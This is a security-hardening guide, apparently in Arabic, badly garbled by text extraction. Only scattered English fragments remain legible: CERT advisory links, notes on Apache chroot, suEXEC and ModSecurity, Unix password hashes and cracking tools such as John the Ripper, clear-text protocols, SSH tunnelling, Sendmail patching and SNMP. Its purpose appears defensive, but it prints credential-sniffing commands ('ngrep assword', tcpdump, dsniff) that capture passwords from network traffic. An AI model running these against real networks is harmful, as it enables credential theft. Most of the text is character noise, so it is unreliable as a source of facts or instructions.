http://www.cert.org/advisories/CA-2001-11.html
http://www.cert.org/advisories/CA-1998-12.html
http://www.cert.org/advisories/CA-2001-05.html
http://www.cert.org/advisories/CA-2002-10.html
http://www.cert.org/advisories/CA-2003-10.html
http://www.cert.org/advisories/CA-2003-16.html
http://www.cert.org/advisories/CA-2003-19.html
Apache Web Server
0
)
5
O) ? , 6 U )
78#
(A-2002-,CA-2002-2717]
-
a
3W 3
R4 S @
6 ' " 7, ,
F)
& PHP ) CGI
0
bP
!
h / 6-
?@
)
_DoS] U )
-)8!
6 „1#
& O) -, 6 U )
" $?@
4@
? `56 1
) <
R4 S @ ^
R4 S @ ^
F) 7
# _Apache]
O) -, 6 U )
4@ , ) 6T)„
3W 3
R4 S @ ^
"
4@ $ _IIS] ' #
) %K
0
6=GX
2 1
),
4@ -, 6 U )
? 5 TG' g
) 6% '2 3 , - 9*
)j 5
) - " -, 6 U )
_
3)
#
] -, 6 U )
? '- 9*
+. /
,G )
e '7 L
4@ $l '? #
, 5
- Y "), )
3 W 3 R4 S @ ^
4@ 0, <P
-)8! 0
4@ Z F
SL $ U
I =B*
B!
,
&
H U#
6
1) U#
"
4@
0 1 !"
N
6*
6*
&
)
5
"
"
?
" \ 2 0 5 SL &
0,<
!"
4@ SK-, 6 U )
R4 S @ - . W L3
("c 7 !89 S
a 5 - Y
h @" ?
0 &'( )3 45 678
"
6@
I5
6h @ " ?
$
Apache 1.3.x
:
•
http://www.apacheweek.com/featurity/security -13
h @" ?
Apache 2.0.x
| http://www.apacheweek.com/features/security-20
•
R4 S @ d *
ah @" - Y
- .
I 5 ("c
0, < P
'7 !89
G X) Z
W
0
"2
,Y
$-,< - <
6h @
("c 7
4)
L3
& http://httpd.org/
&'( )$,%
a
K
"7
4$
%
9:; 678
4@ O) -, 6 U )
DY/ I 5
•
-,< K patch 2 3@ SL " ? 59
"
6 @
http://httpd.apache.org h @ " ?
I5
:
2
0 5 - Y levels Patch ) 6 *
h @" ?
$
4@
Q code Sourde
6*
6Patch 2 3@
-, < K
I5
http://httpd.org/download.cgi
0 5 - Y
h @" ?
GX) 2 3@
'
) 6 @
I5
0 5 - Y | http://httpd.org/dist/httpd/patches/
" ?
$
4@
6*
code
Q
Source
I5
0 5 - Y http://httpd.apache.org/download.cgi h @
h @" ?
6Ptch 2 3@
-, < K
0 5 - Y
- Y ? @ " +F ? G
#B
5!
mod
.
I
4@
(
R4 S @ ^
"
("c :
("c 0,
-
"2
% 5
2
4@
)
)
$ I 2,
),
) X
6-"
.ZF
5 _CA-2002-27] –ssl
%
- 5 - Y SSL
O F$
? G
4
E " E %H ,/ W 3
0
4@
0 < ,6 *
$ chroot
Login
8Q 0
C
/
0
)
- Y
•|•
G',
c
0, 5
$ -, 6 U )
0
6)
I5
! patching " ? 59
,B
6T)„ C
'
- < # 2
Open
) 6 @
http://www.apache.org/dist/httpd/patches/
% !
) X
'
F"
l '-)
,E = G ;!
B 4 Chroot
) •ROOT
, E = G;!
? G,
Chroot 0
session
F
6% '
5 -,6
F W L3
H $, 5 , 4
6
),. $ l '
) E $ /chroot (
U)
4@
?@
F
3
G',
- <&
S
I 5 O) -, 6 U )
0,<
&'(
0
- Y
)
7,
F 3
*
"
9
1G'W L3
, 5
3
0 '
#
("c
?@
K loggingW L3
'# < ) [
U)
:
6% '
6 '? @
a 5 - Y
g
'
6T)„
I
)
, "
S
?@
I5
B
"+
" ,
6A)
? G$ I
I5
) -, 6 U )
g
) R3
4 ) 6 BH $
logging 7 B
5!
H
)"E
B'
,G
("c 7 , 5 ? @ &1 @
6%
1G'\
4@ -, 6 U )
("c 2
6
0, 5
?#
4
, ?# S
•c 7) Y
2, 0
6
6
6U)
,
F 7 !89 " W 3 I
) •c
!89
!89 +P
2#5
W L3
3
4@ Chrooting
("c O) -, 6 U )
R4 M :G
7 L c
4@ -, 6
6- Y Z W L3
F) chrooting
-, 6 U )
F %K
15 /
)
K W L3
6 ,'
5
F) chroot " z 3 ) % !
+
P ) <
6 #6
6U )
?# $, 5 " g@
P F7 [ ,
9P
3
0 5 Z F chroot b.
?@
b.
< TP,
"
H /chroot/httpd
("c 0, 5 6 '
B
:
)
F & 7
2, 0 < , 6 *
^P
,6 *
I
6j*
# 2
CGI,PHP
0, @
4@ #
F
c
2
0
1G') Z F chrooted 7 L
'#
-)8! 0
W 3^P
>
P l'
S
),.
:
8Q 0,
C
5<
'
6 '$-, 6
<
K<@
(E
< @ •c
I 5 0,< ,6 3
http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x
0 <- Y
http://httpd.apache.org/docs2#5 -, @ j 4 b <
F
h @ " Apache
)
)Y
2.0.x
0 < - Y 2.0/logs.html
) CGI , PHP " #
?
)
•c
<
P
[
l ' GX) 0,<P '
,,
$
( ,H $
- Y Π#
=GX
POST ) GET
W L3
S
j< 4
0, 5
6 'O)
6% '
("c
&1@ ? j &' I 5
)
O) -, 6 U )
- 56 l '
^ P
0, 5
6
_detection Intruder] 25/&
N 4)-
6
^
mod_Security n 9 " ,
R 47
6
.
6 „ 1#
7 B
5! ? 5 •c 0 5 POST ) GET
bP
O)
P
" - Y Z ) F
ModSecurity
d *
•c
F
5/
0, 5
"
K
N 4
F
" $ ModSecurity
4@ -, 6 U )
-http://www.modsecurity.org/
-http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126
a
#
4
N ],
Z
"
5 T G' g
I5
,!
#
, 5
F
2
6? "
0_,<
<
F
6 ' Apache User Id
H
, 5
6 '
User Id
F
:
,F
)
- Y 7
#B
5! - .
K<@
,
- 5
- Y
4@ . 6
? # 2 SuEXEC
4@ ?
. CGI ) SSI
) 6@
P
I5 ) :
2
a 5 - Y
"
/
6
2 , 0 , < O) -, 6 U )
L 3 CGI )SSI
-, < <
,< ("c j
3 $ setupid Root
$
User Id
%
b
" - Y
) X #
7, , S
0, < , 6 3 MR / $ ? 5F
) X
SSI
?@ ( &1) -, 6 U )
P 7) Y User Id
" - Y
- Y )
F) ? @
) PHP,CGI,SSI "
F ) 2 < ?# ) j6
;!
) PHP,CGI,SSI
F ? # $ SuEXEC 0 < - Y SuEXEC "
3 'P
9
")
) SSI,CGI,PHP
#
Server Side Includes
3 ,
6? "
06
#
",
0, K5 TG' g
#
:
SuEXEC
(
3 <) S
0,< ,6 3 N
6h @ " ?
6
,
# 4 (,!
6- Y/
SuEXEC "
http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x
0 <- Y
http://httpd.apache.org/docs- h @ " Apache
2.0.x
2.0/suexec.html
0 <- Y
) cgi- bin
6
0,
MR/ $
5 e 'j 4
B / " S1:
. W L3
6
#
F
a
5
HTTP header
("c ) ( E 6
l '\ X
40PHP "
23
- < W L*
("c
5 )
7 !89 K ; !
C
'
6
)-
#
% <
25
z 3 1 2
4 ? 5 T G' g
a
B5# 7 !89
safe 1/
'
PHP
h @" ?
W
8Q 0
C
G X)
P
I5 ' X
0 < Corss Site Scripting XSS %
h @" ?
L3 2
http://www.securityfocus.com/printable/infocus/1706
0 5 - Y
T)„
W
L3 2
"
,G
mod_Security
B5# 7 !89 -,6
Injection SQL&XSS % < R4 S @ ^
0 5 - Y
1
)„ " - Y
DY/ ;! ,
0 5 - Y
&'(
F " ? 59 T L.
#
:
) &5
2
0
56 &K/ &
# _ http://www.cirt.net/code/nikto.shtml h @
0
<@
http://www.modsecurity.org/
6
6& " ?
)
CGI
% H] Nikto
)j 4
6& 2 P
1Account
7R T
2
9P % G
$?
,K
,6 3 N
$?
6
<)
6, )
Q0
b
,K
f ) T) ,
-,< K
P!
6&
$
C
5
h/
7R T
<) $ P
!& " - Y
!89
$-
6
)?
) % ' DY/ I
?@"
0
6) 6 '-,< d *
,6 *
E +
+
?@
" - Y
?# $?
H $-,< -
P
, K " U4 0 <
6" E ) 7 "
F
$
-,< , K +
?@?
"E
1G'$
SB
g
$
-,< , K +
?@?
"E
1G'$
SB
g
, KF) ,
?@
(E
DZ
H$
E
N`6?),
)
?@ =GX
)
)
/j
)
R
0, < ? "
b
P
!&
:
P! &
^P
< TP,
-,< K
6account
Y
6%
4"
75 I
#
u
P!
F)
2
) X$ 5 - Y
, N) = G 0 <
3\ P ? "
€
+
"
? "
% < P
!&
•
-,< = G Account
P
!&
6&
" ?
S
•
DY/ (,!
0-,< = G
, account E ?# $ F
,H ') = GX
6 &'(
4
5! , B
<R hashing
, "
-,< & ) -,<
N -, @
DY/ 2
N1
S
P
3
h
83 ( '$ hash ,
/
< ,6 3
SB
g
F) 2
)b
P! &
•
N1
$ hash
)E $
-, < 3 < $_
?@ ,6
•
6'
P! & Hashing
) ) ,
, Hashe ,
0
N& ]
P
!
)% !
0, 5
,
/
B
5!
-)8!
+
2 1
), ) 2
$
,
6-, 4,
-, < 2),
" I'
6 1G'
P
! & ,H ' ) = GX account
P
! & ,H ' ) = GX
6& ( #.
-
<
\ ' i: 21
)
a
0
•c
H ,F 7 , , e G
- 5 account
R4 S @ ^
,6 3
!89
0,6
,F , , ,
% !
9
" )-
) -,
) , K " U4 ? @]0,<
0_
F ) -, < = G
U 4 ,<
1G' #
,
P
!& 2
" U 4 ?5F
,63
P
[?@
, -,<
P
! & 2'
+
H
5 $
?#
3 1
)
- 3•
6% 5G1
$ F
?@
-
, 5 ,H
6& " - Y
0
P! &
)d*
7
P
!& ?
"
S
d
GP$
P! &
) ( #.
2
= G
W L3
("c
&'( ). /
) User ID
&
h
?@ ?
,K, @ '
0
?
) ,G ?
$, 5
DY/
,
2
P
!
6account ,
, ,F
? "
F
<d *
6 'F
)
"
- Y
<
,
) " g@
S
P! &
# )-
b
hash
) 6 'hash
d *
?,
N ], 5
I 5 MD5
crypt 5 , H
• Y%
P
!&
?
?@ "
:
5 $l '
,6 3
%.
?
, K ?#
"
etc/shadow % '0,
P! &
"
2
0_,
(E
? 5 -
3•
6
2
1
&
!89
6% 'V <
K6U )
I5
- 3• I 5 etc/shadow
u -,
N10 5 - Y &
SL b
P!
l'
6& ? 5
0
I 5 -, < + "
H
("c
- 3•)
hashes
N1?
0
3 A8 $ cracker
C
'
- Y hashes
S
4
/etc/passwd % '?, 3
F
3 % H root
3
- 3•W L3
?, 3 ?#
) 2 #<
N1" S
"
5 b
6account #
B
.
b < #
P
!&
) /etc/passwd
F) #P< ?
?5F
)
? "
#P<
I 5 ? 5F
5 L hashes
/etc/shadow
BH 0, <
b
P! &
P
!
0 &'( )3 45 678
) -,< <R V <
!89 +
)
,<
K6account " #
- Y
6& " ?
'& , < h, / % H
6
,6 3 , , 2 e G
<
#40
0 1 !"
)% !
!"
H
("c
25
g_Network Information System^ NIS
,
NIS
/
0
! 5E % < ) 6 '
#P
<
,G
,
(Mapping) U )
?#
7 !89 ) - 5 %5! 6U )
H Network File System (NFS)
, 6,
hash
P
!
P
!
% < NIS ,
6&
#4
6& C
85! ) 6 '?
) NIS+
P!
* ]l ' 6*
,
%#
),
!89
I #P< 6U )
3
6
? @ ?, 3 ?# ,
- 4 , ,F 6 *
6&
"
6% '$-, @ %5G / 9
5
I $ NIS " -, < "
N ], <P hashes
F
^
("c ^ P
2 )-
0,
H,, e G
C 5! LDAP
("c ( #.
# 4 ) I 0_ ,
u -,
?@" - Y ,
F
SL b
l 'b < #
2 56) -
%#
$_, ,F 6
0, 5
-, < "
,6 3
F)
F) $
) etc/shadow b
47 #
'
b
P
!&
=GX a I
- < $, - 5 V
5 ,H ?
j4
- Y
N ,G
3
$l ' # ) 0,<
1
), 5
? ,
0, 5
- Y
:
c 5G
C
6U )
#4)
)
)S
P
!
) N
("c
4 5
6
GP $
) X
- 5
6&
7
L
" %/
P
!
6&
=GX %
<
SF
("c
? , b
0? "
%
)=
! 5E SL
g
6U )
, <P
G?
9:; 678
)2
-
b
"
P
! & ,H '
%
6%5G1
a,<P S
6
e '
\'2 P
5/
$ 5
SL 7 B
5! #
&'( )$,%
"
6
"
)% !
K6account )
6account
("c ) - 5
6U )
<
6? "
#P
< )% !
b
2
g
)? ,"
%
,
^
2
9
/
I'.
:
6A) " :
) X g
L
6&
?
< TP, &
) = GX e 'j 4 7
P!
) h, / ? # $ ,
account ? 5 TG' g
^
$ #P< )
! 5E
6& d *
3? "
6SL 0
,
P
!
hashes
#.
5#.
? @ ( #.
K
S
&' * " - Y
?
P
P
!
d *
N F- 5
$, < -, < 3 < 5B
A" @ $ 6? "
?@
)-
-J )
"
3?
6
P!
!
M) / ) ,!
\X
)
5 $O 3
P
!&
?
("c
2
I 'L
c 9 <
6&
P
"
%5
Q
O*
N F2
0 <-
0 , K5 = G 3
-,< 3 < (
B' (
) " )@
( $O
W 3
(E
*
-
93
?@ d *
$
&
" $ "
" U
(8!
6&
,1
<P?@
"
I 5 ("c % 5G1
" ?
T
("c A"
6 #) h
&N F
E
P 785/ ?, < F
7
H?
-
- < # 2
?@ _
H I
("c 0
)@
?"
2 ), " U 4 0_‚
, P4
) 4 " ? 59
]
" ) -,<
1
) K5 - 3•
-, < F
I5 ?
I5
@
? !$7 P
!
6&
3•" M, 6] , <P %#
$ -, < = G
6 % 5G1
P!
P
!&
" ) - 3•
P
!
%5
#
/
) 5B
E ) O * W L3
5 MR/ $ 5B
-J)
password
d *
6&
P
= G
_pa$$w0rd], 5
-
6
-,< Y
P
!&
$_
-J ) M) / ) KP
Y1M) / "
("c
Y
3
M) /
• ,G
6&
O* ,
,
0_? @ =B*
P!
$ 5B 6M / 2 1
) 2' ]
)
#
:
0, < ,6 3 crack $
0,< -,< h PH
(E
],<
"password" (
K6
P!
SB
g 0
= G - . W L3
2 ?
H&
"
6
P
!& 2
M) / % ,P ( ,H C
'
A)
6A) " - Y
,6 3 785/ " \ 2
KP
Y1M) / "
I5 ) - 5
)6? "
?@
" ,G 0
' ? "W L3 )
P
!& d *
" - Y ) ,G
•
" ? 59
6?
' T /2 !
<) "
S
) ( #.
P
!&
7 B
5! $ & @
P 785/ (
6
6& ( E
0 5 crack
2
P
!&
$
T#<
A" @ ) S
,G
PF 62 )
T 5! " U 4
P!
6&
.
2
& 2
0
% 5! " U 4
P
!
6&
Npasswd " ,
6
U
: -, < d *
6 *
6
0, 5 - Y
. 7
]Cracklib " ,
*
?),
? ,
- <\ X
)
6
P
!
$
I5
I
#
0, 5
F) Enabled
,
crak ?@
6&
1/ Cracking
C, E
P!
("c , <
5 $? "
,<
P
'7 B
5! ?
("c
6" E
0
( E -, <
6&
("c
v 4
& _ E
2
"
6&
O * - . W L3
+H ) F
u
5 John the Ripper , (4lc4)10 phtcrack version
K6
P!
7
6&
? G ) stand-alone
- Y cracking
" - Y $= GX
b
& PAM-Enabled
P
!
2 )
u
P
!&
#P< )
L $
P
!&
%
7
K " U4
?
" ,
"
DY/ 2 <
Q0
6
N
" U4 0
5
b
6% 5G1
I K6 & " - Y ?#
? , " ("c " E S
S
6
- Y -,<
?
) Npasswd
5
l' 6
) ("c
F
N656 I 5 ("c
,
PAM-
S
1) U#
Q 0, 5 - Y
_ Crack
$
E
0
6%5G1
) A & l ' GX)
)C3 0
"]
K ? @
I $?
,K
& S
I5
N
K <)
0
hashes
0
P!
6&
#
0 #.
- Y etc/shadow/ "
F) hashes
I 5 A8 ) hashes
" - Y W L3
\
2 #
- 5 (N
P
!
6&
("c
"
0
3
P :
(E
2
LDAP ) NIS
6" E
$, -,
2 &N F 25
6 & ) 25
9
6" E
- 3•/etc/passwd
) NIS
?,
6
)
$, -,
#
H
6$, <
0
, 6 3 ? @ cracking
6*
5
•
DY/
$,
Z F LDAP
DY/ ? #
6&
-,<
"
) <
25
F) 25
2&N F 25
<,
6 &
g
9
6
- Y %
4 :
- Y MDS
N1"
2
0
- Y
6& ? 5 hash
P
!
5
7 L
N
I 5 Crypt 5 ,H
N1"
0
b
? @
0
DY/ (, ! 7
' ,63
?
$, < , 5 ,H ) #.
H, , e G
A" @
I
2 < (, ! $ N
DY/ ) ,<
P! &
<
4
P! &
" %P
H)S
6&
?
P
!
6&
:
2
0
1E
E
6 N4
W 3 K6 2 ) )
) X
62 ) " 0
V
? "
, ?@
%
has expired
O*
3
K6( 4 2 `
•
P $
5 - Y ?@ "
, account 60
P )
5#.
) , ,F P! &
u 7 ) X ) _ ' L 7 L -,< , 1 ] 1
)
B
1
$ 6 )
'
H
, P4
:
2
)?
)
("c) ( E
^P
P
!
N
1 -,< , K
3 - 56) "
P
!
& log in 2 1
)
,
&
/ ? 59 ?@ ?
# 54
"2
I K6
K6account MR/ )
1 P! 0
B'
4) K T
) T G' g
6account &5 0 < +H ) , Y
)
P! &
A" @ ?
6A" @ ?
U)
:
6&
<-
$, 5
, ,F 6account , # 4 0,<
?
b
%L
K ("c
- Y ?@ "
DY/
B
.
SB
g 0
("c 2
) " ?# 7
0
6&
P
!
, account 60 account
P )
$?
, Y 5! ( 5 -, 6,
'
0
MR /
P
!
?@ ?, 3 ?#
?
/
P $S
K (,! 0,<P
F
$
6&
6
B
5F " , -,< - 3•?@
P
!&
U)
% <
F) ? N
Your password
3
F
B
5G1
, <P
= GX
? "
("c
'
P
!
6&
)
P
-,<
6account ? )&' I 5
- 4 $,<
(N "
5 ?@" - Y
3
nB
G account MR /
0
"%
I
'
3
- Y $, - 5
Clear Text Servies
7
L $ U#
$
P
N&
=GX 0, 5
?#
P
!&
6
-,< - Y
5 - Y
?5F
3
6-
I?
telent
) FTP
bP
7 !89 d *
2
2
F
?# $S
? 5F
b
N
)( d *
0 , <, 6 3
Clear 7
2
_
L
7 !89
text plain
" )-
,
b
!89
SL
<] -,<
U#
< ?#
b
' ,B )-
6
"
R4 S @
)@ +5F
a,6
3
6N
6-
#P
< 6U )
?
,
) ))7
L $ -, 6 U )
-,< -
.
_login 7 !89 ]
$ F
<d *
0, 5
!89
I 5 8Q 0 )@ , 6 3
, 6 3 plain- text 7
!89
" ,G
) -,< E ^ P 7
6v 4 ) ? ,
6'
,5! ) - Y
$
sniffer
-, < K
2,
SB
g 0
N&
h / 7 !89
) #P
<
6U )
"
) 6 ' _ #P< ' -,6 ]
bP
B
.
#P
< 6U )
"
_
)
N6 ]
3 785/
)
6
P! &
3
1 " T),F
$, 5
1P $ Text
U)
Clear
7 4
Clear Auth
1
@
Content
FTP
21,20
Yes
Yes
$2
TFTP
69
Yes
N/A
$2
telnet
23
Yes
Yes
2
SMTP
25
Yes
N/A
$2
Pop3
110
Yes
Yes
$2
rlogin
513
Yes
Yes
2
HTTP
80
Yes
Yes
$2
?
6, K
, 6 3 TP,
?
^
2 c
h /
F$2
6-
FTP ) Telnet
I K6U )
T
L
7 !89 $ , <
" ,E - Y
2 7
,
6U )
< TP,
b
$
P
!&
clear text 7
,
0, 5 Z F $ , K
F$ ) - "
2
‚ / T3
- Y ? 5F
Clear text
I
?5F
-)8! , 5
? @" - Y
0,<
7 !89 % <
&1?),
%
a I YB* 7 , ,
7 !89 d *
)$
< $ ,L
-, < K
6*
5
Free/OpenBSD j
0, 5
SL
6U )
) 2 3@
^
l ' 6U )
"2
$:
"
3
6U ) ] l ' R4 S @ : d *
? 5F
b
_sniffer] -, < - Y
0 1 !"
6&
6
ZQ
5
5
]U
1) U#
$ e 'j 4 7 L $ _,<
!"
clear
7
5 ) FTP )telnet ]
T) ,
2
I
",
)
" $-, < K U#
5 0_, <P
)(
3 - *1 7
$785/ ( E
- Y text Clear
<
L 7
+. /
0, 5
0
0 &'( )3 45 678
I 5 A) 2
&'(
2t5: ) 2
[
# $ _text
? 5 T G'- . 0 5 - Y tcpdump $
"2
" 7 L clear text ^ P
a
F
2 1
), 0
6d *
I 5 $l '
#tcpdump-X-s1600
5 - Y & ngrep a
assword
6 ' #P<
-,
'
- .0
I
I N
) sername
6
I W 3 K N1
$ 15 / • & M) /
5 - Y
" ?
"
2
E F ?# $ l '
I 5 $ M) / 21
)] , 5
http://www.packetfactoty.net/projects/ngrep/
0_
"7 L l'
? 5 TG'
#ngrep assword
h
/
0
6-
d *
"2
I5
& 2 1
),
6% # ) 4 )
N \
h @" ?
l
'
? 5 TG'- . 0 5 - Y
:
2
$ Dsniff 0 5 - Y _ P
!& )( ]?
P! & ) ( z)"
? @ $ d . " U4 ) ( E
6& " ?
5 W L3
("c
POP3 ) Telnet )FTP
? )@
$l'
I $ E/ Plain text
,
0
, 63j
5
http://www.monkey.org/~dugsong/dsniff/
a
"7 L $l'
#/usr/sbin/dsniff
&'( )$,%
level•Link
,
,<
N& %H ,/ ) End- To- End
N, # T G
•$ 7 # )
connection
6
N&
BH
m .1" 6%# ) 4 3
9:; 678
N& " - Y
+H ) , Y
?
$,<
5
_tunneling]
h
SSH
% H]
) Z F U#
)(replaces
6*
R 4 M :G ) T) ,
Q
l'
-, < "
- 4
5
I]
N&
( E SSl
OpenSSh
_ http://www.openssh.org/ h @
telnet,rloging,rsh) ) - " 7 9P
0
"2
_ HTTPS , POP3S
K6% # ) 4
) $ SSH:Secure Shell n 9 "
0
%
- Y X11 )(pop3,SMTP
I
?@ " ?
I K6%# ) 4]tunneling
)
0, 6
2<
?
)
connection )
?@ ,
POP3 ? 5 tunnel - .
Z F & SSH
0
"
P POP3 -, 6 U )
a K5
F -,
U)
#ssh-L110:pop3.mail.server.com:[email protected]
- < localhost
7
4$ 6
7
4POP3.MAIL.server.com 7
7 L
# ) #1
# ) #1
4 -, 6 U )
4 -,
U)
$
] TCP110
T 5G T) M83
) 2 < 2 7 9P
5 S
110
2, _
0 (tunneled over SSH) 0,< ,6 3 ( E -,< &
stunnel " - Y tunneling
P
) _ openSSL Toolkit " - Y
0
] "
, * plain text 7) Y
'
N&
T) ,
- 4
6% / - "
N
#
SSL %# ) 4 $ l 'A) 0
6%# ) 4 ? 5 tunnel
0 5 - Y http://www.stunnel.org h @ " ?
I5
?@ ?
l'
'
Senmail
6
? 5
) ') ' $ T
# Sendmail 0
"
? G ?@ "
- Y $
785/ ?
(,!
:
# ) #1
)-
)?
?
- Y U
-
1)
4? ,6U)
- 5
? 5F
5 ,H % 1
, -,< ( E 785/ Q
:
2
-
6
SB
g
#
#1
Mail Transfer Agent 2 1
),
-
3 ?1
$ Sendmail
I 5 ?@ "
- 56
'
# ) #1 6
1
) M ,6"
-
-,6
$-,< SL
a 5 - <
?@
+" U „@
# Sendmail 0
^P
6*
,G
S
3 785/ "
patch
5 2,
CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL
-CERT ADVISORY CA-2003-07-REMOTE BUFFER
-
CERT
ADVISORY
CA-2003-25
BUFFER
OVERFLOW
IN
SENDMIL
a 5
-,5! -)
)
?
SENDMAIL
bP 7 , , ) 7 :3
,
, 6 3 BUFFER OVERFLOW ?@
#4)
% , PC
8Q], <
T) \ 7 , , ")
< TP
B
!
7"
PATCHING (, !
) e 'j 4 ,
#4
"
Y 7 GP ,
B % ! 0_ # ) #1 6
S
2'
+"
) 5 ,H
- 1
@ &
6*
6% '" - Y
" - Y
() \ 7 , ,
C,5!
B
B
!
0
+. /
send mail " -, < S L *
0,<
- 5 U#
)U
1 6*
TG'e 'j 4 7 L $l 'U )
!"
*
K
)f ,
5 ,H *
-
) '
' j6 ?@
? 5 d*
I
0 1 !"
0, 5 - Y
R4 S @ ^
X !
Send mail
<R
HS @e G
"
0
0 &'( )3 45 678
6patch )
R 4 S @ ?& $ 9
< ,6 3
5 CP
l ' &'(
sendmail
" ,
, ,F
-,
patch
*
- 5<
Echo\$z\usr /lib/sendmail- bt-d0
7Y ,
$
,
#4
F
sendmail -, <
" ?
sendmail -,< d *
l'
K
*
2
3@ "
6
@
, <
http://www.sendmail.org/current-releaese.html h @
&'( )$,%
4 sendmail DY/ ) "
a
$
F
6patch 2 3@ " ) Z
*
http://www.sendmail.org h @ " ?
]
% !
? ,
X !
9
I
" %/
F
source code
patch
9:; 678
25
2 3@
- 5 sendmail *
-, < K % !
%
'
0
#
'
•
*
- Y
5 - Y
?
$_package
0 5 GF
U
1 6
?@
Q
1G') - P I
e
'j 4 7
•
L C 5! sendmail
mail -, 6 U )
? !
# @
/] U#
)
daemon
)
6
_
,6 * mail
SL
? # _ –bd ˆK ? 5 T G' g]0, K5
T
#4
:
sendmail
sendmail
1/
2
< ,6 3
etc/mail/sendmail.cf h @
F l ' 62 <
F) ? `56l ' 6
# 4 % ' mail reliy
,
b
<( E
c 5G )
C
^P
# ) #1
P
5
,
0
- <
sendmail.cf $ ,
< (
#4% '
0
.
"
"
Z F deamon 1/
$
!89 +
" ?
:
2
sendmail
0
%
H
•
("c #
/ ? 596, < ( E
, #4
a 5 - Y
http://www/sendmail.org/tips/relaying.html
http://www/sendmail.org/m4/anti_spam.html
T G' g e
3j 4 ,
'j 4 7
#4
L open relay ? # sendmail 8.9.0 *
?@ C, E $ % !
6
? ,
- 5 -, < K sendmail *
$% !
-, 6 U )
- Y
(, !]
( E
X !"
" - Y 7
W
" ,G0,<
0, 5
L3 2
("c
TG'
H
_realying]0
("c$_ N
-,
? 5 ˆ K ] sendmail , ,F *
*
, $ 5 ,H *
b
-, < K
$ sendmail ,
h @" ?
,
#4
#4
" - Y ? "
6% ' u W L3
^P
7 K
&F "
("c
6@
•
,
0
0 5 - Y http://www/sendmail.org/m4/readme.html
download
)
- Y pgp signature "
9
"
" g@
6*
integrity
<R
Q
# *
?),
ca-2002-28 h @ " ?
?
" E " ? 59
< H
0 <- Y
3O *
" sendmail
F +
?@ "
/S
? "
:
2
•
#
I
# 2
$
("c :
5 sendmail
0 5
source code
sendmail
B5# 7 !89
2
'
6trojan
I5 0 , 5
, - 5 sigm
I
6, B0 5 - Y CERT advisory
-, < - Y
http://www.sendmail.org/ftp/pgpkevs/ h @ " ?
I 5 MD5Checksum "
a 5 - Y
sendmail
'
PGP ?, '7
)@
,
0
- Y sendmail +P , INTEEGRITV
"
!89 +
" ?
7 !89 S
http://www.sendmail.org/secure-install.html
http://www.sendmail.org/m4/security_notes.html
gshapiro/secu rity.pdf http://www.sendmail.org /~
Simple network management protocol
(SNMP)
6- N
5
SNMP" - Y
, # 4) ) - " y
#
I 5 ?@ "
0 <
SB
g
- Y
$T
-
1
)$
6Access Point$ 6ˆ K $ 6 ) $ N4
" $SNMP0 <
#P
<
- Y $ #P
<y
) SNMP
6N
,
6N
TCP/IP
G
- Y
SNMP %# ) 4 "
I
#P< 7) Y
P ' 4
6( '784 2
I K 6N
, ) ,
6N
6-
"
2 ( 4 1P
I5
' )
)Y
0, 5
"
PG ), K (& # ) -,< 1P
,G
* ]SNMP
,
-, < - Y
6N
I 5 -,< - Y
B %
6A)
6A)
! B
5F " $ 6 ( 4
bP
R4 S @ ^
b
6( 4
3
-, < K
(E
H$l ' R 4 S @ ^
, ) ,
I 5 -, < - Y
" - Y
# 4 _U )
6 A) " [
? 5F 0
? '
9
SNMP
A) " [
, G 7c L. ) - P ),. SNMP" W 3
,1 b
), K
:
6A)
- Y
R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ?
R4 S @ ^ 0
3
3
SNMP R4 S @ ^
0, <
7 K
&F - 5 _
6( 4
#4
% <&
*
$l '
? ,
" ] DOS \ " 7) Y 785/
SNMP
P 7 & E ) 7c@ 2<
-, < - Y
o
SNMP 5 , H
]
&
? G -,< &
$
SNMP 5 , H
6A) " [
N& S
6*
g’ V
6(
P e
%
! N "$
-, Y SNMP
5 i: j &' I 5 ? , , 1 "
< $h /
6-
^
$ SNMP
' )
!89
< TP,
I5
_?@
-, < % L
3 M, 6nH ) S
*
e
'j 4 7
T, " - Y
-, < K
P
6A) W L3
#P< 7 & E
" %
/f
%1
,
:
$"), )
F
2
- Y )
("c ,
G ) G
I 5P ^
u“
L 3 “7 L
3
) 7 !89 Z '
25F 0,<
,G ) TG' SNMP
5 SNMP
- 5< *
$SNMP
#4?
) ,<
- 5< *
d * SNMP0_, *
5 U#
785/ Q
$SNMP
-, < d *
U#
?@ - 5 ) SL SNMP *
U
T G'e 'j 4 7
SNMP , # 4
6
1) U#
% !
6
L $l '% # ) 4
SNMP
l ' R4 S @ :
$
P 785/ &1 @
,, e G
)-
6
- Y $ Bridges ) 6point access$ 6 N4
0
0
Q 0, <
^P
3 785/ &
c L. $ N
]0, <
“V
X !
] #P<
Q 0, <
K
6T, " - Y
,K
" ,G b
H$l '7 !89 " - Y
, 1
, 5
B!,
j & '
) 6
F
j , 4
R4 S @ ^
<0_, 5
O*
6( 4 , K
"
5 i:
L ? ,
H
6N
3 ]
6N
6 * 0_78#
- Y
R4S @^
PG
PG ) , K I 5
" $SNMP) )
<’
'j 4 A N0, <
6( 4 "
4 "
6A) " - Y (,!0, 5
<“
,
6*
P
5
SB
g
0,
#P
<% !
6
0 < ,6 3
=GX
6
)
X !
) 6N
H,, e G
R4 S @ d *
?
2
$ #P<
-,< %L
)
F
5 $ SNScan N 4
6N
0 5 - Y
)
SNMPSL
A)
P
) #5
- .
I5
"
h @n
0
9"
5
("c
7,
-
?
$
?
,
2
E F$?
F) N 4
0
I 5 ("c 7 B
5!$SNMP "
1 ("c
"
http://www.foundstone.com/knowledge/free_tools.html
'
W L3
@?
6 & " - Y ?#
(E
:
2
SNMPZ&F ) SL
7 L
- 4- ."
0
6 @ " U4
GF
9
SNMP?
(E
#
% !
T G'd *
2'
5
'
2
F)0
(E
w•w)w•p 67 4 )
("c 7 K&F "
6 @
I5 0
b <"
6"
F T/ “SNMP“
R4S
B1$ SNMP
@
0 5 - Y CERT-2002 03h @" ?
# n. 7
a < ,6 3
? G -, < - Y
] 13
W L3
$SNMPSL ) "
H,, )S @e G
F)•
'j 4SNMP Community
)e
_ P
!
")
F)•
community SNMP Y*
F)•
6 <
DY/ - .
$ l ' R4 S @ : %
DY/ I 5
0 5
a-,
,, )?
P@
?@ " - Y 7 ) X (,! 7
N& ) 6( 4 , K
I 5 $ SNMPv3
6
3
6, "
%
DY/
